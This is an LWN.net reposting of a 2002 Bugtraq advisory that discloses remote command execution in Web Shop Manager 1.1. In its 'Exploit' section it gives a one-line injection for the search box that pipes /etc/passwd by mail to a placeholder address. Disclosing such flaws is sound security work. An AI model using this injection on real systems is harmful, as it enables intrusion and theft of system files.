LWN.net Logo

Not logged in

Log in now

Create an account

Subscribe to LWN

Weekly Edition

Return to the Security page

Sponsored link

Vyatta – Linux & Open Source Alternative to Cisco – Advanced Routing, Firewall, VPN, QoS..
Free Download ->

Recent Features

LWN.net Weekly Edition for September 4, 2008

The Kernel Hacker's Bookshelf: UNIX Internals

DRI, BSD, and Linux

SCHED_FIFO and realtime throttling

LWN.net Weekly Edition for August 28, 2008

Printable page
Weekly edition Kernel Security Distributions Search
Archives Calendar Subscribe Write for LWN LWN.net FAQ

Remote command execution in Web Shop Manager

[Posted August 19, 2002 by corbet]

From:  Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To:  bugtraq@securityfocus.com
Subject:  Web Shop Manager Security Vulnerability
Date:  Thu, 15 Aug 2002 03:15:37 -0700 (PDT)

Summary 
The Web Shop
Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows executing
of arbitrary commands with the privileges of the
script file used by the product.

Details 
Vulnerable systems:
 * Web Shop Manager version 1.1

Exploit:
It is possible to send server's password file any mail
address by writing the following command in Web Shop
Manager's search box:

 |mail user@host.com < /etc/passwd

 



__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com
(Log in to post comments)

Copyright © 2002, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds